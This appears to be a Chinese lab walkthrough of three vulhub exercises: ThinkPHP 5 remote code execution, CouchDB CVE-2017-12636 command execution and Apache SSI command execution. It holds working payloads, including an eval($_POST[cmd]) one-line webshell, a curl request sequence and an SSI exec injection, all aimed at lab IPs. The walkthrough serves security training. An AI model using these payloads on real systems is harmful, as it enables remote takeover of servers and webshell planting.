一、Thinkphp5 2-rce远程代码执行漏洞
1.打开靶场环境

2、访问网页

3、构造payload
172.16.1.18:8080?s=/Index/index/L/${@phpinfo()}

4、写入一句话木马,使用蚁剑连接
172.16.1.18:8080/?s=/Index/index/name/${@print(eval($_POST[cmd]))}

二、Couchdb 任意命令执行漏洞(CVE-2017-12636)
1、启动靶场环境,并在浏览器中访问


2、增加一个管理员用户


3、依次执行如下请求即可触发任意命令执行
curl -X PUT 'http://vulhub:vulhub@172.16.11.11:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
curl -X PUT 'http://vulhub:vulhub@172.16.1.11:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@172.16.1.11:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://vulhub:vulhub@172.16.1.11:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

4、进入容器查看 /tmp/ 路径下 是否生成 success 文件

三、Apache SSI 远程命令执行漏洞
1、开启靶场环境并在浏览器中打开


2、写入一句话木马
<!--#exec cmd="echo '<?php phpinfo(); ?>' > /var/www/html/this.php" -->
3、上传文件,点击查看是否写入


4、进入容器查看

5、获取phpinfo













![2024Mysql And Redis基础与进阶操作系列(1)作者——LJS[含MySQL的下载、安装、配置详解步骤及报错对应解决方法]](https://i-blog.csdnimg.cn/direct/46749a9ae2bf431688491b937adcbbb2.png)





